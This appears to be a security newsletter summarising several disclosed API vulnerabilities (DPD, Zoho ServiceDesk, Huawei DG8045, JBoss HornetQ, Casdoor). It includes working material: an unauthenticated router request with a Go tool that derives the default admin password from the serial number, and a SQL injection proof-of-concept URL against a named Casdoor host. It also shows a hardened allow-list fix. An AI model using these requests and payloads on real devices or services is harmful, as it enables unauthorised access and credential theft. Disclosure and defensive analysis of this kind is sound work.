API exploits: the week of January 31st. Huawei, Zoho, and DPD API auth bypass.

DPD package sniffing by API

First of all, this is a good example of vulnerability disclosure handled well by the largest parcel delivery network in Europe. Credit to the DPD security team for their response.

The full story is available here: https://www.pentestpartners.com/security-blog/dpd-package-sniffing/

In short: if you know a parcel code, a REST API call returns the recipient's postal code. With the parcel code and the postal code, a second API endpoint returns the full details of that delivery, including the recipient's private data and photos of the package and of the recipient as well. Because the "second factor" (the postal code) is obtainable from the first call, knowing a parcel code is all it takes.


Zoho ManageEngine ServiceDesk Plus REST API auth bypass

Zoho ManageEngine ServiceDesk Plus versions 11.3 before 11302, 11.2 before 11208, 11.1 before 11145, and 11.0 before 11012 are vulnerable to an authentication bypass that allows a few REST API URLs to be called without authentication. The risk of this issue is critical.

The affected API endpoints can be identified by checking the Zoho release notes for the fixed builds.

Source: https://www.tenable.com/plugins/nessus/157383

Huawei DG8045 credential disclosure by API auth bypass

The Huawei DG8045 router (and some other, undisclosed models) exposes device information through a REST API endpoint that is not protected by any authentication. Because the default router password is the last 8 characters of the device serial number, anyone who can reach the web interface can derive the admin password from a single response.

This exploit is as simple as one API call:


GET /api/system/deviceinfo HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.1/
X-Requested-With: XMLHttpRequest
Connection: close


HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Date: Thu, 24 Jun 2021 02:07 GMT+2
Connection: Keep-Alive
Content-Language: en
Content-Type: application/javascript
Content-Length: 141

while(1); /*{"DeviceName":"DG8045","SerialNumber":"21530369847SK9252081","ManufacturerOUI":"00E0FC","UpTime":81590,"HardwareVersion":"VER.A"}*/

Source: https://vulners.com/zdt/1337DAY-ID-37300

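As an added example (not part of the original post or of the cited exploit), the Go program below parses the response above and applies the rule stated in the write-up: the default password is the last 8 characters of the serial number. The one thing worth noticing in the capture is the `while(1); /* ... */` wrapper around the JSON. That is an anti-JSON-hijacking trick aimed at browsers, not an access control, so a non-browser client simply strips it. The sample body is copied from the response above; the `fetchDeviceInfo` helper, its self-signed-certificate handling and the command-line base URL are assumptions made for this example.

```go
package main

import (
	"crypto/tls"
	"encoding/json"
	"errors"
	"fmt"
	"io"
	"net/http"
	"os"
	"strings"
	"time"
)

// deviceInfo holds the fields visible in the /api/system/deviceinfo response above.
type deviceInfo struct {
	DeviceName      string `json:"DeviceName"`
	SerialNumber    string `json:"SerialNumber"`
	ManufacturerOUI string `json:"ManufacturerOUI"`
	UpTime          int    `json:"UpTime"`
	HardwareVersion string `json:"HardwareVersion"`
}

// sampleBody is the body of the captured response shown above (copied here so
// the program runs offline).
const sampleBody = `while(1); /*{"DeviceName":"DG8045","SerialNumber":"21530369847SK9252081","ManufacturerOUI":"00E0FC","UpTime":81590,"HardwareVersion":"VER.A"}*/`

// unwrapBody strips the "while(1);" prefix and the /* ... */ comment around the
// JSON. That wrapper only breaks a <script src=...> include in a browser; it is
// not authentication, and any non-browser client discards it.
func unwrapBody(body string) (string, error) {
	start := strings.Index(body, "/*")
	end := strings.LastIndex(body, "*/")
	if start < 0 || end < 0 || end <= start+2 {
		return "", errors.New("no /* ... */ wrapped JSON payload in body")
	}
	return body[start+2 : end], nil
}

// parseDeviceInfo unwraps and decodes the response body.
func parseDeviceInfo(body string) (deviceInfo, error) {
	var info deviceInfo
	raw, err := unwrapBody(body)
	if err != nil {
		return info, err
	}
	if err := json.Unmarshal([]byte(raw), &info); err != nil {
		return info, fmt.Errorf("decoding device info: %w", err)
	}
	if info.SerialNumber == "" {
		return info, errors.New("response has no SerialNumber")
	}
	return info, nil
}

// defaultPassword applies the rule from the advisory: the factory password is
// the last 8 characters of the serial number.
func defaultPassword(serial string) (string, error) {
	if len(serial) < 8 {
		return "", fmt.Errorf("serial number %q is shorter than 8 characters", serial)
	}
	return serial[len(serial)-8:], nil
}

// fetchDeviceInfo sends the same unauthenticated GET as the capture above.
// The router UI uses a self-signed certificate, hence InsecureSkipVerify (assumption).
func fetchDeviceInfo(baseURL string) (deviceInfo, error) {
	client := &http.Client{Timeout: 10 * time.Second,
		Transport: &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true}}}
	req, err := http.NewRequest(http.MethodGet, baseURL+"/api/system/deviceinfo", nil)
	if err != nil {
		return deviceInfo{}, err
	}
	req.Header.Set("Accept", "application/json, text/javascript, */*; q=0.01")
	req.Header.Set("X-Requested-With", "XMLHttpRequest")
	resp, err := client.Do(req)
	if err != nil {
		return deviceInfo{}, err
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(io.LimitReader(resp.Body, 1<<16))
	if err != nil {
		return deviceInfo{}, err
	}
	return parseDeviceInfo(string(body))
}

func main() {
	// With no argument, parse the captured body; with a base URL such as
	// https://192.168.1.1, query a device you are authorised to test.
	var info deviceInfo
	var err error
	if len(os.Args) > 1 {
		info, err = fetchDeviceInfo(os.Args[1])
	} else {
		info, err = parseDeviceInfo(sampleBody)
	}
	pw := ""
	if err == nil {
		pw, err = defaultPassword(info.SerialNumber)
	}
	if err != nil {
		fmt.Fprintln(os.Stderr, "error:", err)
		os.Exit(1)
	}
	fmt.Printf("%s serial %s -> default password %s\n", info.DeviceName, info.SerialNumber, pw)
}
```

The takeaway for a reviewer: an unauthenticated endpoint that returns a serial number is an information disclosure on its own, and it becomes a credential disclosure the moment the default password is derived from that serial number.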

Red Hat JBoss EAP 7. Remote Code Execution by deserialization. Incomplete fix of CVE-2016-4978 in HornetQ library. CVE-2021-20318

Some fixes take time. Some take months. Sometimes a fix takes even longer, like 5-6 years, as happened with JBoss EAP.

A JMS ObjectMessage carries a serialized Java object, and CVE-2016-4978 was about HornetQ deserializing untrusted ones. That fix was incomplete: arbitrary Java code execution through deserialization remained possible for roughly five years after the first fix, until CVE-2021-20318 addressed it.

Source: https://access.redhat.com/security/cve/cve-2021-20318

Casdoor get-organizations API endpoint SQL injection

No, SQL injections are not dead at all. They have survived for the last 24 years (counting from the first published write-up in Phrack in 1998) and they still kill APIs.

Casdoor is a popular Open Source centralized authentication system.

This vulnerability was found by analysing the Go source code.

The query API accepts field and value parameters to support filtering by field.

It inserts the user-supplied field name directly into the raw SQL expression (only value is bound as a parameter), which leads to a SQL injection vulnerability:

session = session.And(fmt.Sprintf("%s like ?", util.SnakeString(field)), fmt.Sprintf("%%%s%%", value))

And /api/get-organizations is a public route that anyone can call.

Proof of concept:

https://door.casbin.com/api/get-organizations?p=1&pageSize=10&value=e99nb&sortField=&sortOrder=&field=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1))%20%20and%20name

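To make the injection concrete, here is an added Go example (not Casdoor's code) that extracts field and value from the PoC URL above, builds the same expression as the quoted line, and shows a hardened variant next to it. Two things are assumptions made for this example rather than taken from the page: snakeString stands in for Casdoor's util.SnakeString, and allowedFields is a hypothetical allow-list of Organization columns.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
	"unicode"
)

// pocURL is the proof-of-concept request from the write-up.
const pocURL = "https://door.casbin.com/api/get-organizations?p=1&pageSize=10&value=e99nb&sortField=&sortOrder=&field=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1))%20%20and%20name"

// pocParams extracts the field and value query parameters the handler reads.
func pocParams(raw string) (field, value string, err error) {
	u, err := url.Parse(raw)
	if err != nil {
		return "", "", err
	}
	q := u.Query()
	return q.Get("field"), q.Get("value"), nil
}

// snakeString stands in for Casdoor's util.SnakeString (CamelCase -> snake_case).
// The behaviour is assumed; the real helper is not shown on the page.
func snakeString(s string) string {
	var b strings.Builder
	for i, r := range s {
		if unicode.IsUpper(r) {
			if i > 0 {
				b.WriteByte('_')
			}
			b.WriteRune(unicode.ToLower(r))
			continue
		}
		b.WriteRune(r)
	}
	return b.String()
}

// vulnerableFilter builds the same expression as the line quoted above: the
// column name is pasted into the SQL text, only the value is a bound parameter.
func vulnerableFilter(field, value string) (sql string, args []interface{}) {
	return fmt.Sprintf("%s like ?", snakeString(field)), []interface{}{fmt.Sprintf("%%%s%%", value)}
}

// allowedFields is a hypothetical allow-list of filterable Organization columns.
var allowedFields = map[string]bool{"owner": true, "name": true, "display_name": true}

// identRe accepts plain lower-case identifiers only; anything with spaces,
// parentheses or quotes never reaches the query builder.
var identRe = regexp.MustCompile(`^[a-z_][a-z0-9_]*$`)

// safeFilter refuses any column name that is not a plain identifier on the
// allow-list; the value is still passed as a bound parameter.
func safeFilter(field, value string) (sql string, args []interface{}, err error) {
	col := snakeString(field)
	if !identRe.MatchString(col) || !allowedFields[col] {
		return "", nil, fmt.Errorf("unsupported filter field %q", field)
	}
	return fmt.Sprintf("%s like ?", col), []interface{}{fmt.Sprintf("%%%s%%", value)}, nil
}

func main() {
	field, value, err := pocParams(pocURL)
	if err != nil {
		panic(err)
	}
	sql, args := vulnerableFilter(field, value)
	fmt.Printf("vulnerable: %s  args=%q\n", sql, args)
	if _, _, err := safeFilter(field, value); err != nil {
		fmt.Println("hardened  :", err)
	}
	sql, args, _ = safeFilter("displayName", value)
	fmt.Printf("hardened  : %s  args=%q\n", sql, args)
}
```

The value is bound as a parameter, which is exactly why the PoC attacks field instead: a column name cannot be bound by the driver, so the only sound fix is to validate it against an allow-list of identifiers rather than to escape it.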
Kudos to Wuhan005 from China.
